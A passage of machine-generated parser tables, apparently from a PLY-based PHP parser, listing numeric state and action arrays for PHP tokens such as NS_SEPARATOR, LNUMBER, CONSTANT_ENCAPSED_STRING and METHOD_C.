205,210,217,218,222,230,244,245,246,251,254,255,256,260,261,265,267,268,270,275,276,277,284,285,286,287,288,289,291,292,293,294,295,296,297,304,336,345,346,347,348,351,352,354,355,356,360,361,365,369,371,375,389,393,394,404,407,409,410,411,423,424,425,429,432,441,442,443,444,446,449,455,456,457,465,468,476,477,479,485,487,488,489,490,491,499,500,501,502,503,504,513,517,528,532,533,535,537,540,545,550,551,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,601,602,608,609,613,614,616,617,620,621,622,629,630,634,636,637,638,639,640,645,646,653,656,657,661,670,671,672,679,682,693,703,734,735,740,741,742,746,748,751,752,759,762,763,764,771,773,776,781,782,784,790,796,797,803,806,811,813,814,820,822,825,826,831,832,835,836,839,841,842,845,848,851,852,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,889,892,894,898,899,907,908,909,910,911,912,913,914,915,917,918,924,925,927,928,931,934,935,937,938,940,944,949,950,951,954,955,961,962,963,964,967,969,971,972,973,975,976,],[-443,35,-3,-2,-4,-5,-6,35,-50,116,-443,124,116,35,35,35,35,35,-47,35,-443,188,189,190,116,35,35,35,35,35,35,116,116,35,35,35,35,35,35,35,35,35,35,35,35,35
,35,-112,116,-443,116,279,35,35,-23,116,35,-48,303,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,-38,-40,-42,116,116,-443,363,364,-167,-168,35,35,35,35,35,35,35,35,35,35,35,35,35,116,116,35,116,116,116,35,35,35,-113,-114,303,426,430,35,35,35,35,-8,-443,35,116,-30,-22,-24,-25,-26,35,-11,124,452,-12,116,475,35,35,-39,-41,-43,-44,35,-45,452,-46,35,35,-56,116,116,116,35,35,116,303,35,35,116,542,543,35,116,35,35,35,-7,35,-9,35,35,-28,452,452,452,116,452,612,35,35,35,35,35,35,35,116,116,-443,35,641,452,116,116,116,35,35,116,116,116,116,116,689,691,35,35,35,35,-10,-29,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,116,452,736,737,-443,-443,35,35,-33,-70,-443,116,-37,-49,-443,-53,-57,-60,-443,116,452,116,116,-111,116,-160,-161,-162,35,35,35,-27,452,452,-443,-62,35,35,35,116,116,-51,-55,35,452,452,452,-110,116,847,-443,303,116,303,35,35,-31,-64,35,-34,35,-85,35,116,-443,-443,-443,452,-109,-443,891,895,452,-443,452,35,-65,-71,35,-36,-83,-443,-443,-92,-93,-86,-87,35,-61,35,35,923,-443,452,933,-123,35,-443,-35,-76,-443,35,-443,35,-88,-54,-108,452,933,116,452,-122,35,-32,35,35,35,116,959,960,-63,-84,-443,970,-443,-77,35,-443,-126,-128,35,-52,35,-127,]),'STRING_VARNAME':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,
841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,80,-3,-2,-4,-5,-6,80,-50,-443,80,80,80,80,80,-47,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,-443,80,80,-23,80,-48,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,-38,-40,-42,-443,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,-8,-443,80,-30,-22,-24,-25,-26,80,-11,-12,80,80,-39,-41,-43,-44,80,-45,-46,80,80,-56,80,80,80,80,553,80,80,80,-7,80,-9,80,80,-28,80,80,80,80,80,80,80,-443,80,80,80,80,80,80,80,-10,-29,-443,-443,80,80,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,80,80,80,-27,-443,-62,80,80,80,-51,-55,80,-110,80,80,-31,-64,80,-34,80,-85,80,-443,-443,-443,-109,80,-65,-71,80,-36,-83,-443,-443,-92,-93,-86,-87,80,-61,80,80,80,-443,-35,-76,-443,80,-443,80,-88,-54,-108,80,-32,80,80,80,-63,-84,-443,-443,-77,80,-443,80,-52,80,]),'NS_SEPARATOR':([0,2,3,4,5,6,7,9,10,11,12,13,15,19,23,24,25,28,29,32,35,40,41,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,112,113,114,116,117,119,120,121,127,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,173,179,180,191,192,193,194,195,196,197,198,199,200,201,202,205,209,211,217,218,222,229,231,244,245,246,251,259,265,267,268,270,275,276,277,278,279,284,285,286,287,288,289,291,292,294,295,296,298,304,336,345,346,347,348,351,352,354,355,356,360,361,365,369,371,375,389,392,404,407,408,423,424,425,429,432,441,442,443,444,446,449,452,455,456,457,464,466,467,468,477,479,485,487,488,489,490,491,499,500,501,503,504,513,516,518,528,529,532,533,535,537,540,541,545,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,600,602,613,614,616,617,620,621,622,629,630,634,636,637,638,639,640,645,646,652,656,657,661,679,68
2,693,703,730,734,735,740,741,742,746,748,751,752,759,762,763,764,771,773,775,776,781,796,803,806,811,813,814,820,822,825,826,831,832,835,836,839,841,851,852,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,892,894,898,899,907,908,909,910,911,912,913,914,915,917,918,924,925,927,928,931,933,934,935,937,938,940,944,951,954,955,962,963,964,967,969,971,972,973,975,976,],[-443,81,-3,-2,-4,-5,-6,81,-50,115,118,-443,128,81,81,81,81,81,-47,81,-429,210,81,-430,81,81,81,81,81,230,230,81,81,81,81,81,81,81,81,81,81,81,81,81,81,115,118,-443,-429,-430,81,81,-23,118,81,-48,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,-38,-40,-42,230,230,-443,81,81,81,81,81,81,81,81,81,81,81,81,81,118,393,230,81,230,118,409,230,81,81,81,118,81,81,81,81,-8,-443,81,118,-428,230,-30,-22,-24,-25,-26,81,-11,465,-12,128,118,81,81,-39,-41,-43,-44,81,-45,465,-46,81,81,-56,210,517,517,81,81,118,81,81,118,81,230,81,81,81,-7,81,-9,81,81,-28,-429,465,465,465,118,601,-430,465,81,81,81,81,81,81,81,230,230,-443,81,465,210,517,118,653,81,118,81,230,230,230,230,118,230,81,81,81,81,-10,-29,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,118,465,-443,-443,81,81,-33,-70,-443,230,-37,-49,-443,-53,-57,-60,-443,210,465,118,517,-111,517,81,81,81,-27,118,465,465,-443,-62,81,81,81,230,230,-51,-55,81,465,465,465,118,-110,517,230,81,81,-31,-64,81,-34,81,-85,81,517,-443,-443,-443,465,-109,465,-443,465,81,-65,-71,81,-36,-83,-443,-443,-92,-93,-86,-87,81,-61,81,81,-443,465,517,-123,81,-443,-35,-76,-443,81,-443,81,-88,-54,-108,465,517,210,465,-122,-429,81,-32,81,81,81,210,-63,-84,-443,-443,-77,81,-443,-126,-128,81,-52,81,-127,]),'EXIT':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,19
5,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,82,-3,-2,-4,-5,-6,82,-50,-443,82,82,82,82,82,-47,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,-443,82,82,-23,82,-48,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,-38,-40,-42,-443,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,-8,-443,82,-30,-22,-24,-25,-26,82,-11,-12,82,82,-39,-41,-43,-44,82,-45,-46,82,82,-56,82,82,82,82,82,82,82,82,-7,82,-9,82,82,-28,82,82,82,82,82,82,82,-443,82,82,82,82,82,82,82,-10,-29,-443,-443,82,82,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,82,82,82,-27,-443,-62,82,82,82,-51,-55,82,-110,82,82,-31,-64,82,-34,82,-85,82,-443,-443,-443,-109,82,-65,-71,82,-36,-83,-443,-443,-92,-93,-86,-87,82,-61,82,82,82,-443,-35,-76,-443,82,-443,82,-88,-54,-108,82,-32,82,82,82,-63,-84,-443,-443,-77,82,-443,82,-52,82,]),'DIE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,55
9,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,83,-3,-2,-4,-5,-6,83,-50,-443,83,83,83,83,83,-47,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,-443,83,83,-23,83,-48,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,-38,-40,-42,-443,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,-8,-443,83,-30,-22,-24,-25,-26,83,-11,-12,83,83,-39,-41,-43,-44,83,-45,-46,83,83,-56,83,83,83,83,83,83,83,83,-7,83,-9,83,83,-28,83,83,83,83,83,83,83,-443,83,83,83,83,83,83,83,-10,-29,-443,-443,83,83,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,83,83,83,-27,-443,-62,83,83,83,-51,-55,83,-110,83,83,-31,-64,83,-34,83,-85,83,-443,-443,-443,-109,83,-65,-71,83,-36,-83,-443,-443,-92,-93,-86,-87,83,-61,83,83,83,-443,-35,-76,-443,83,-443,83,-88,-54,-108,83,-32,83,83,83,-63,-84,-443,-443,-77,83,-443,83,-52,83,]),'LNUMBER':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,76
4,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,88,-3,-2,-4,-5,-6,88,-50,-443,88,88,88,88,88,-47,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,-443,88,88,-23,88,-48,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,-38,-40,-42,-443,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,-8,-443,88,-30,-22,-24,-25,-26,88,-11,88,-12,88,88,-39,-41,-43,-44,88,-45,88,-46,88,88,-56,88,88,88,88,88,88,88,88,-7,88,-9,88,88,-28,88,88,88,88,88,88,88,88,88,88,88,-443,88,88,88,88,88,88,88,88,-10,-29,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,-443,-443,88,88,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,88,-111,88,88,88,-27,88,88,-443,-62,88,88,88,-51,-55,88,88,88,88,-110,88,88,-31,-64,88,-34,88,-85,88,-443,-443,-443,88,-109,88,88,88,-65,-71,88,-36,-83,-443,-443,-92,-93,-86,-87,88,-61,88,88,88,88,-443,-35,-76,-443,88,-443,88,-88,-54,-108,88,88,88,-32,88,88,88,-63,-84,-443,-443,-77,88,-443,88,-52,88,]),'DNUMBER':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,70
3,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,89,-3,-2,-4,-5,-6,89,-50,-443,89,89,89,89,89,-47,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,-443,89,89,-23,89,-48,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,-38,-40,-42,-443,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,-8,-443,89,-30,-22,-24,-25,-26,89,-11,89,-12,89,89,-39,-41,-43,-44,89,-45,89,-46,89,89,-56,89,89,89,89,89,89,89,89,-7,89,-9,89,89,-28,89,89,89,89,89,89,89,89,89,89,89,-443,89,89,89,89,89,89,89,89,-10,-29,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,-443,-443,89,89,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,89,-111,89,89,89,-27,89,89,-443,-62,89,89,89,-51,-55,89,89,89,89,-110,89,89,-31,-64,89,-34,89,-85,89,-443,-443,-443,89,-109,89,89,89,-65,-71,89,-36,-83,-443,-443,-92,-93,-86,-87,89,-61,89,89,89,89,-443,-35,-76,-443,89,-443,89,-88,-54,-108,89,89,89,-32,89,89,89,-63,-84,-443,-443,-77,89,-443,89,-52,89,]),'CONSTANT_ENCAPSED_STRING':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,35,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,452,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,61
6,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,90,-3,-2,-4,-5,-6,90,-50,-443,90,90,90,90,90,-47,90,187,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,-443,90,90,-23,90,-48,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,-38,-40,-42,-443,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,-8,-443,90,-30,-22,-24,-25,-26,90,-11,90,-12,90,90,-39,-41,-43,-44,90,-45,90,-46,90,90,-56,90,90,90,90,90,90,90,90,-7,90,-9,90,90,-28,187,90,90,90,90,90,90,90,90,90,90,90,-443,90,90,90,90,90,90,90,90,-10,-29,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,-443,-443,90,90,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,90,-111,90,90,90,-27,90,90,-443,-62,90,90,90,-51,-55,90,90,90,90,-110,90,90,-31,-64,90,-34,90,-85,90,-443,-443,-443,90,-109,90,90,90,-65,-71,90,-36,-83,-443,-443,-92,-93,-86,-87,90,-61,90,90,90,90,-443,-35,-76,-443,90,-443,90,-88,-54,-108,90,90,90,-32,90,90,90,-63,-84,-443,-443,-77,90,-443,90,-52,90,]),'LINE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,5
86,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,91,-3,-2,-4,-5,-6,91,-50,-443,91,91,91,91,91,-47,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,-443,91,91,-23,91,-48,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,-38,-40,-42,-443,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,-8,-443,91,-30,-22,-24,-25,-26,91,-11,91,-12,91,91,-39,-41,-43,-44,91,-45,91,-46,91,91,-56,91,91,91,91,91,91,91,91,-7,91,-9,91,91,-28,91,91,91,91,91,91,91,91,91,91,91,-443,91,91,91,91,91,91,91,91,-10,-29,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,-443,-443,91,91,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,91,-111,91,91,91,-27,91,91,-443,-62,91,91,91,-51,-55,91,91,91,91,-110,91,91,-31,-64,91,-34,91,-85,91,-443,-443,-443,91,-109,91,91,91,-65,-71,91,-36,-83,-443,-443,-92,-93,-86,-87,91,-61,91,91,91,91,-443,-35,-76,-443,91,-443,91,-88,-54,-108,91,91,91,-32,91,91,91,-63,-84,-443,-443,-77,91,-443,91,-52,91,]),'FILE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,
576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,92,-3,-2,-4,-5,-6,92,-50,-443,92,92,92,92,92,-47,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,-443,92,92,-23,92,-48,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,-38,-40,-42,-443,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,-8,-443,92,-30,-22,-24,-25,-26,92,-11,92,-12,92,92,-39,-41,-43,-44,92,-45,92,-46,92,92,-56,92,92,92,92,92,92,92,92,-7,92,-9,92,92,-28,92,92,92,92,92,92,92,92,92,92,92,-443,92,92,92,92,92,92,92,92,-10,-29,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,-443,-443,92,92,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,92,-111,92,92,92,-27,92,92,-443,-62,92,92,92,-51,-55,92,92,92,92,-110,92,92,-31,-64,92,-34,92,-85,92,-443,-443,-443,92,-109,92,92,92,-65,-71,92,-36,-83,-443,-443,-92,-93,-86,-87,92,-61,92,92,92,92,-443,-35,-76,-443,92,-443,92,-88,-54,-108,92,92,92,-32,92,92,92,-63,-84,-443,-443,-77,92,-443,92,-52,92,]),'DIR':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,
557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,93,-3,-2,-4,-5,-6,93,-50,-443,93,93,93,93,93,-47,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,-443,93,93,-23,93,-48,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,-38,-40,-42,-443,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,-8,-443,93,-30,-22,-24,-25,-26,93,-11,93,-12,93,93,-39,-41,-43,-44,93,-45,93,-46,93,93,-56,93,93,93,93,93,93,93,93,-7,93,-9,93,93,-28,93,93,93,93,93,93,93,93,93,93,93,-443,93,93,93,93,93,93,93,93,-10,-29,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,-443,-443,93,93,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,93,-111,93,93,93,-27,93,93,-443,-62,93,93,93,-51,-55,93,93,93,93,-110,93,93,-31,-64,93,-34,93,-85,93,-443,-443,-443,93,-109,93,93,93,-65,-71,93,-36,-83,-443,-443,-92,-93,-86,-87,93,-61,93,93,93,93,-443,-35,-76,-443,93,-443,93,-88,-54,-108,93,93,93,-32,93,93,93,-63,-84,-443,-443,-77,93,-443,93,-52,93,]),'CLASS_C':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,
485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,94,-3,-2,-4,-5,-6,94,-50,-443,94,94,94,94,94,-47,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,-443,94,94,-23,94,-48,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,-38,-40,-42,-443,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,-8,-443,94,-30,-22,-24,-25,-26,94,-11,94,-12,94,94,-39,-41,-43,-44,94,-45,94,-46,94,94,-56,94,94,94,94,94,94,94,94,-7,94,-9,94,94,-28,94,94,94,94,94,94,94,94,94,94,94,-443,94,94,94,94,94,94,94,94,-10,-29,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,-443,-443,94,94,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,94,-111,94,94,94,-27,94,94,-443,-62,94,94,94,-51,-55,94,94,94,94,-110,94,94,-31,-64,94,-34,94,-85,94,-443,-443,-443,94,-109,94,94,94,-65,-71,94,-36,-83,-443,-443,-92,-93,-86,-87,94,-61,94,94,94,94,-443,-35,-76,-443,94,-443,94,-88,-54,-108,94,94,94,-32,94,94,94,-63,-84,-443,-443,-77,94,-443,94,-52,94,]),'METHOD_C':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441
